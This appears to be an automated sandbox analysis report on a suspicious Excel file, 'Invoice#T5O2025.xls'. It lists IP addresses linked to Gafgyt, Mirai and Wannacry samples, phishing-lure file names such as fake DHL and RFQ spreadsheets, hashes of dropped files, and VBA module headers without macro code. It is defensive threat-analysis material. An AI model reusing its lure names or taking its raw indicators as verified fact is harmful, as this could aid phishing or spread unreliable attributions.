                              19MgUpI9tj.dllGet hashmaliciousWannacryBrowse
                              • 107.175.251.2
                              a-r.m-6.Sakura.elfGet hashmaliciousGafgyt, MiraiBrowse
                              • 23.95.72.10
                              rebirth.sh4.elfGet hashmaliciousGafgytBrowse
                              • 23.95.73.77
                              rebirth.arm4.elfGet hashmaliciousGafgytBrowse
                              • 23.95.73.77
                              m-p.s-l.Sakura.elfGet hashmaliciousGafgyt, MiraiBrowse
                              • 23.95.72.10
                              s-h.4-.Sakura.elfGet hashmaliciousGafgyt, MiraiBrowse
                              • 23.95.72.10
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              258a5a1e95b8a911872bae9081526644Order.xlsGet hashmaliciousUnknownBrowse
                              • 13.107.246.45
                              RFQ # PC25-1301.xlsxGet hashmaliciousUnknownBrowse
                              • 13.107.246.45
                              DHL AWB CUSTOM CLEARANCE.xlsGet hashmaliciousUnknownBrowse
                              • 13.107.246.45
                              P-04071A.xlsGet hashmaliciousUnknownBrowse
                              • 13.107.246.45
                              ProductBOMpq_v4.xlsmGet hashmaliciousUnknownBrowse
                              • 13.107.246.45
                              RFQ____PC25-1301.xlsxGet hashmaliciousUnknownBrowse
                              • 13.107.246.45
                              B317.xlsxGet hashmaliciousUnknownBrowse
                              • 13.107.246.45
                              YYYY-NNN AUDIT DETAIL REPORT .docxGet hashmaliciousUnknownBrowse
                              • 13.107.246.45
                              CY SEC AUDIT PLAN 2025.docx.docGet hashmaliciousUnknownBrowse
                              • 13.107.246.45
                              H565rymIuO.docGet hashmaliciousUnknownBrowse
                              • 13.107.246.45
                              No context
                              Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):118
                              Entropy (8bit):3.5700810731231707
                              Encrypted:false
                              SSDEEP:3:QaklTlAlXMLLmHlIlFLlmIK/5lTn84vlJlhlXlDHlA6l3l6Als:QFulcLk04/5p8GVz6QRq
                              MD5:573220372DA4ED487441611079B623CD
                              SHA1:8F9D967AC6EF34640F1F0845214FBC6994C0CB80
                              SHA-256:BE84B842025E4241BFE0C9F7B8F86A322E4396D893EF87EA1E29C74F47B6A22D
                              SHA-512:F19FA3583668C3AF92A9CEF7010BD6ECEC7285F9C8665F2E9528DBA606F105D9AF9B1DB0CF6E7F77EF2E395943DC0D5CB37149E773319078688979E4024F9DD7
                              Malicious:false
                              Reputation:high, very likely benign file
                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.H.e.a.r.t.b.e.a.t.C.a.c.h.e./.>.
                              Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                              File Type:data
                              Category:dropped
                              Size (bytes):20971520
                              Entropy (8bit):8.112143835430977E-5
                              Encrypted:false
                              SSDEEP:3:Tuekk9NJtHFfs1XsExe/t:qeVJ8
                              MD5:AFDEAC461EEC32D754D8E6017E845D21
                              SHA1:5D0874C19B70638A0737696AEEE55BFCC80D7ED8
                              SHA-256:3A96B02F6A09F6A6FAC2A44A5842FF9AEB17EB4D633E48ABF6ADDF6FB447C7E2
                              SHA-512:CAB6B8F9FFDBD80210F42219BAC8F1124D6C0B6995C5128995F7F48CED8EF0F2159EA06A2CD09B1FDCD409719F94A7DB437C708D3B1FDA01FDC80141A4595FC7
                              Malicious:false
                              Reputation:moderate, very likely benign file
                              Preview:Timestamp.Process.TID.Area.Category.EventID.Level.Message.Correlation...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                              Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                              File Type:data
                              Category:dropped
                              Size (bytes):20971520
                              Entropy (8bit):0.0
                              Encrypted:false
                              SSDEEP:3::
                              MD5:8F4E33F3DC3E414FF94E5FB6905CBA8C
                              SHA1:9674344C90C2F0646F0B78026E127C9B86E3AD77
                              SHA-256:CD52D81E25F372E6FA4DB2C0DFCEB59862C1969CAB17096DA352B34950C973CC
                              SHA-512:7FB91E868F3923BBD043725818EF3A5D8D08EBF1059A18AC0FE07040D32EEBA517DA11515E6A4AFAEB29BCC5E0F1543BA2C595B0FE8E6167DDC5E6793EDEF5BB
                              Malicious:false
                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                              Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):71
                              Entropy (8bit):4.3462513114457515
                              Encrypted:false
                              SSDEEP:3:Tuekk9NJtHFfs1XsExen:qeVJ8u
                              MD5:8F4510F128F81A8BAF2A345D00F7E30C
                              SHA1:8C711E6C484881ECDC83B6BDAC41C7A19EDE9C37
                              SHA-256:15AA8B35FC5F139EF0B0FBC641CAA862AED19674625B81D1DC63467BC0AAFED9
                              SHA-512:78695E5E2337703757903B8452E31A98F860022B04972651212C3004FEBE29017380A8BCA9FCCFD935DE00D8BD73AA556C30A3CEA5FC76E7ADF7E7763D68E78F
                              Malicious:false
                              Preview:Timestamp.Process.TID.Area.Category.EventID.Level.Message.Correlation..
                              Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                              File Type:ASCII text, with very long lines (28560), with CRLF line terminators
                              Category:dropped
                              Size (bytes):20971520
                              Entropy (8bit):0.21757714676559262
                              Encrypted:false
                              SSDEEP:1536:NW4saaWnPX4oh8VQ2SsXpHgej8zRZaG2HFjZ31S3eCD/TLZ+TuGcthI+IPk+ltmq:bswILVQ6XFg3Hx7gpiMeDJBpUof
                              MD5:3D47DBAF4CA5E31C1E09A0A4DF505D5E
                              SHA1:5E17D36E4D2109420B581D9996483DE59A004CCC
                              SHA-256:56AEFBB2A089CBE98E33B0D7F0287721B1C01D444699D094C5FB2573E9F9DFF2
                              SHA-512:2B7FB8BD91F11F8AEFCC2154D1AAC965E548F1F1CD0D963E1572E054B05EFBF891D751EEE6905329D6031697FE295EA21DDBE3291F0F25071FAB437E295BFFB2
                              Malicious:false
                              Preview:Timestamp.Process.TID.Area.Category.EventID.Level.Message.Correlation..01/16/2025 07:31:29.610.EXCEL (0xA08).0x1A64.Microsoft Excel.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Experimentation.FeatureQueryBatched","Flags":33777005812056321,"InternalSequenceNumber":17,"Time":"2025-01-16T07:31:29.610Z","Data.Sequence":0,"Data.Count":128,"Data.Features":"[ { \"ID\" : 1, \"N\" : \"Microsoft.Office.Telemetry.TrackCPSWrites\", \"V\" : false, \"S\" : 1, \"P\" : 0, \"T\" : \"2025-01-16T07:31:29.1888955Z\", \"C\" : \"33\", \"Q\" : 0.0, \"M\" : 0, \"F\" : 5 }, { \"ID\" : 1, \"N\" : \"Microsoft.Office.Telemetry.CPSMaxWrites\", \"V\" : 2, \"S\" : 1, \"P\" : 0, \"T\" : \"2025-01-16T07:31:29.1888955Z\", \"C\" : \"33\", \"Q\" : 0.0, \"M\" : 0, \"F\" : 5 }, { \"ID\" : 1, \"N\" : \"Microsoft.Office.Word.UAEOnSafeModeEnabled\", \"V\" : true, \"S\" : 1, \"P\" : 0, \"T\" : \"2025-01-16T07:31:29.1888955Z\", \"C\" : \"\", \"Q\" : 8.0, \"M\" : 0, \"F\" : 5, \"G\" : \"Opt\" }, { \"ID\" : 1, \"N
                              Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                              File Type:data
                              Category:dropped
                              Size (bytes):20971520
                              Entropy (8bit):0.0
                              Encrypted:false
                              SSDEEP:3::
                              MD5:8F4E33F3DC3E414FF94E5FB6905CBA8C
                              SHA1:9674344C90C2F0646F0B78026E127C9B86E3AD77
                              SHA-256:CD52D81E25F372E6FA4DB2C0DFCEB59862C1969CAB17096DA352B34950C973CC
                              SHA-512:7FB91E868F3923BBD043725818EF3A5D8D08EBF1059A18AC0FE07040D32EEBA517DA11515E6A4AFAEB29BCC5E0F1543BA2C595B0FE8E6167DDC5E6793EDEF5BB
                              Malicious:false
                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                              Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                              File Type:ASCII text, with very long lines (28809), with CRLF line terminators
                              Category:dropped
                              Size (bytes):315587
                              Entropy (8bit):5.121206187127477
                              Encrypted:false
                              SSDEEP:1536:WFQFzffSHQx2qTu4kmQyaW+x8ENkzJlDVD4PyoZu7BL6o+6MpCBPEj560TTmh9Fj:FFrxpf7B2d/5hpfReDJBpUL8
                              MD5:C2CF51EAF4402D396CA8C1AC0B8D1992
                              SHA1:3CE47A91A630EFCFCCA3687602FD754BE879C461
                              SHA-256:7A714129A3344044469305E98B8416ED6340541387513F283A979B88D29A51B8
                              SHA-512:3A7B9D4221B3BFC00FDF466B1BF298EE55E1BECB21C4EDFAB9D0A82EA980DF8A5345866CF483B19A879FE5A4D08F56AE78F80B21F5D11340CC4A1F84D32273C8
                              Malicious:false
                              Preview:Timestamp.Process.TID.Area.Category.EventID.Level.Message.Correlation..01/16/2025 07:32:50.959.EXCEL (0x1498).0x850.Microsoft Excel.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Experimentation.FeatureQueryBatched","Flags":33777005812056321,"InternalSequenceNumber":18,"Time":"2025-01-16T07:32:50.959Z","Data.Sequence":0,"Data.Count":128,"Data.Features":"[ { \"ID\" : 1, \"N\" : \"Microsoft.Office.Telemetry.TrackCPSWrites\", \"V\" : false, \"S\" : 1, \"P\" : 0, \"T\" : \"2025-01-16T07:32:50.7412539Z\", \"C\" : \"33\", \"Q\" : 0.0, \"M\" : 0, \"F\" : 5 }, { \"ID\" : 1, \"N\" : \"Microsoft.Office.Telemetry.CPSMaxWrites\", \"V\" : 2, \"S\" : 1, \"P\" : 0, \"T\" : \"2025-01-16T07:32:50.7412539Z\", \"C\" : \"33\", \"Q\" : 0.0, \"M\" : 0, \"F\" : 5 }, { \"ID\" : 1, \"N\" : \"Microsoft.Office.Word.UAEOnSafeModeEnabled\", \"V\" : true, \"S\" : 1, \"P\" : 0, \"T\" : \"2025-01-16T07:32:50.7412539Z\", \"C\" : \"\", \"Q\" : 7.0, \"M\" : 0, \"F\" : 5, \"G\" : \"Opt\" }, { \"ID\" : 1, \"N
                              Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                              File Type:data
                              Category:dropped
                              Size (bytes):512
                              Entropy (8bit):0.0
                              Encrypted:false
                              SSDEEP:3::
                              MD5:BF619EAC0CDF3F68D496EA9344137E8B
                              SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                              SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                              SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                              Malicious:false
                              Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                              Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                              File Type:data
                              Category:dropped
                              Size (bytes):512
                              Entropy (8bit):0.0
                              Encrypted:false
                              SSDEEP:3::
                              MD5:BF619EAC0CDF3F68D496EA9344137E8B
                              SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                              SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                              SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                              Malicious:false
                              Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                              Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                              File Type:data
                              Category:dropped
                              Size (bytes):339968
                              Entropy (8bit):7.498522056073093
                              Encrypted:false
                              SSDEEP:6144:rk3hbdlylKsgwyzcTbWhZFVE+WaxHAgJycxdI2rHJFZpLcriO5nzdbNih7FnOIbi:QJTxdI2z/A+OZzdbNih7FnRMOu1WC
                              MD5:5F0F18593B1F35AA7D08D38521E4DA3C
                              SHA1:09E89483FA431AC8865DE4A5708FB2AB4F5896F1
                              SHA-256:EBA57064371AB6CB419C8CA7076C472ED979358029B1A2FB336C95AFB5E53BC6
                              SHA-512:2A341288F8A4E9D0628E8B93550426CD5F4A5199019B755C71D4518484CE619955DB4D9057B7859A3A97FB06C7D9F1619F2CA3CBB5637A145E51586983A42CCE
                              Malicious:false
                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                              Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                              File Type:Composite Document File V2 Document, Cannot read section info
                              Category:dropped
                              Size (bytes):1536
                              Entropy (8bit):1.2697113618902367
                              Encrypted:false
                              SSDEEP:6:rl912N0xs+CFfEnjlX+lG8ElCl5XCB9Xh9X:rl3lKFulXanMClJCb7
                              MD5:3A8F2C2D3A845C211B2FDD450EF76903
                              SHA1:503C3A769A02CCB0FB40448C4DE805D8C39E3FAF
                              SHA-256:5454F142B5A0D0B793443B956157543A6A5A632A3330E0A5B28B3FDDD32B63CD
                              SHA-512:934E9935D91C052B2F59BE1EF25416BFBCF2ED8CB14393AEC2C4C425C739B97C2FB6104B5710F2B14B17DACEE26D12B618880CC3690395B8DD63A25453300629
                              Malicious:false
                              Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                              Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                              File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Thu Jan 16 07:32:48 2025, Security: 1
                              Category:dropped
                              Size (bytes):890880
                              Entropy (8bit):7.639313711226848
                              Encrypted:false
                              SSDEEP:24576:7pbl/Az1dbIXRMLgVVu3bVobARM8mN6qf+F+5:VbpAMX+MVVu3bVhaN6qfmi
                              MD5:37DFBB0160F75743ED48B8ABD78D77A7
                              SHA1:DA7CA3E1A132957131F347A5C8914ABF63DD2A67
                              SHA-256:8EDEACEDA8C631A0876083D6F2DEBF6F390DCBD8CBA772734C34E22515F47FCC
                              SHA-512:2D0E198BDB816B62A105F01D80F60E7E126A9599EBBCF4FF71651E6057AB493352AA3056F28FC4DCD40D9DAF5AFAA343F776FA9E725FB08D4A9916346AA05693
                              Malicious:false
                              Preview:......................>...............................................................................C...D...................s...............................................................................................................................................................................................................................................................................................................................................................................................................B...$....................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                              Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):26
                              Entropy (8bit):3.95006375643621
                              Encrypted:false
                              SSDEEP:3:ggPYV:rPYV
                              MD5:187F488E27DB4AF347237FE461A079AD
                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                              Malicious:false
                              Preview:[ZoneTransfer]....ZoneId=0
                              Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                              File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Thu Jan 16 07:32:48 2025, Security: 1
                              Category:dropped
                              Size (bytes):890880
                              Entropy (8bit):7.639313711226848
                              Encrypted:false
                              SSDEEP:24576:7pbl/Az1dbIXRMLgVVu3bVobARM8mN6qf+F+5:VbpAMX+MVVu3bVhaN6qfmi
                              MD5:37DFBB0160F75743ED48B8ABD78D77A7
                              SHA1:DA7CA3E1A132957131F347A5C8914ABF63DD2A67
                              SHA-256:8EDEACEDA8C631A0876083D6F2DEBF6F390DCBD8CBA772734C34E22515F47FCC
                              SHA-512:2D0E198BDB816B62A105F01D80F60E7E126A9599EBBCF4FF71651E6057AB493352AA3056F28FC4DCD40D9DAF5AFAA343F776FA9E725FB08D4A9916346AA05693
                              Malicious:true
                              Preview:......................>...............................................................................C...D...................s...............................................................................................................................................................................................................................................................................................................................................................................................................B...$....................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                              File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed Jan 15 01:51:22 2025, Security: 1
                              Entropy (8bit):7.766933452071543
                              TrID:
                              • Microsoft Excel sheet (30009/1) 47.99%
                              • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                              • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                              File name:Invoice#T5O2025.xls
                              File size:1'275'904 bytes
                              MD5:672c67954a3bfbd5cd55c71d59d5b6cf
                              SHA1:2568553e9931dea57a5d27239b406319a8ca1c6a
                              SHA256:11cef9a224722a7d5726188155d3c6ccd2a206a49ce9121e338a843617856b75
                              SHA512:6788ed9a19da35f7bfb63ca983328b6fc6a3976978b702653f5cdd229b5bb3be541e527c6aaadc0c2321af80b63778821a6e731f4f348add2216a8bd0d7c4b9f
                              SSDEEP:24576:/kefLKcMea3tjAb1ZbcPBsTYiF3bVDbARM839jpnvMGJs/Vo:MefLK553lgkP28iF3bVwfnvMGJw
                              TLSH:B14501C3A68D9F42C92643307AB34B5D1712AD03DA6262BB22F4771E6BF72D04543F5A
                              File Content Preview:........................>.......................................................................................................m.......o.......q.......s......................................................................................................
                              Icon Hash:35ed8e920e8c81b5
                              Document Type:OLE
                              Number of OLE Files:1
                              Has Summary Info:
                              Application Name:Microsoft Excel
                              Encrypted Document:True
                              Contains Word Document Stream:False
                              Contains Workbook/Book Stream:True
                              Contains PowerPoint Document Stream:False
                              Contains Visio Document Stream:False
                              Contains ObjectPool Stream:False
                              Flash Objects Count:0
                              Contains VBA Macros:True
                              Code Page:1252
                              Author:
                              Last Saved By:
                              Create Time:2006-09-16 00:00:00
                              Last Saved Time:2025-01-15 01:51:22
                              Creating Application:Microsoft Excel
                              Security:1
                              Document Code Page:1252
                              Thumbnail Scaling Desired:False
                              Contains Dirty Links:False
                              Shared Document:False
                              Changed Hyperlinks:False
                              Application Version:786432
                              General
                              Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                              VBA File Name:Sheet1.cls
                              Stream Size:977
                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x I . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
                              Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 78 49 e2 89 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                              Attribute VB_Name = "Sheet1"
                              Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                              Attribute VB_GlobalNameSpace = False
                              Attribute VB_Creatable = False
                              Attribute VB_PredeclaredId = True
                              Attribute VB_Exposed = True
                              Attribute VB_TemplateDerived = False
                              Attribute VB_Customizable = True
                              

                              General
                              Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
                              VBA File Name:Sheet2.cls
                              Stream Size:977
                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x I . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . -
                              Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 78 49 89 02 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                              Attribute VB_Name = "Sheet2"
                              Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                              Attribute VB_GlobalNameSpace = False
                              Attribute VB_Creatable = False
                              Attribute VB_PredeclaredId = True
                              Attribute VB_Exposed = True
                              Attribute VB_TemplateDerived = False
                              Attribute VB_Customizable = True
                              

                              General
                              Stream Path:_VBA_PROJECT_CUR/VBA/Sheet3
                              VBA File Name:Sheet3.cls
                              Stream Size:977
                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x I } . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . -
                              Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 78 49 e1 7d 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                              Attribute VB_Name = "Sheet3"
                              Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                              Attribute VB_GlobalNameSpace = False
                              Attribute VB_Creatable = False
                              Attribute VB_PredeclaredId = True
                              Attribute VB_Exposed = True
                              Attribute VB_TemplateDerived = False
                              Attribute VB_Customizable = True
                              

                              General
                              Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                              VBA File Name:ThisWorkbook.cls
                              Stream Size:985
                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x I . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . - .
                              Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 78 49 eb d1 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                              Attribute VB_Name = "ThisWorkbook"
                              Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                              Attribute VB_GlobalNameSpace = False
                              Attribute VB_Creatable = False
                              Attribute VB_PredeclaredId = True
                              Attribute VB_Exposed = True
                              Attribute VB_TemplateDerived = False
                              Attribute VB_Customizable = True
                              

                              General
                              Stream Path:\x1CompObj
                              CLSID:
                              File Type:data
                              Stream Size:114
                              Entropy:4.25248375192737
                              Base64 Encoded:True
                              Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                              Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                              General
                              Stream Path:\x5DocumentSummaryInformation
                              CLSID:
                              File Type:data
                              Stream Size:244
                              Entropy:2.889430592781307
                              Base64 Encoded:False
                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
                              Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00
                              General
                              Stream Path:\x5SummaryInformation
                              CLSID:
                              File Type:data
                              Stream Size:200
                              Entropy:3.250350317504982
                              Base64 Encoded:False
                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . . . K f . . . . . . . . .
                              Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00
                              General
                              Stream Path:MBD0081AAF9/\x1CompObj
                              CLSID:
                              File Type:data
                              Stream Size:99
                              Entropy:3.631242196770981
                              Base64 Encoded:False
                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
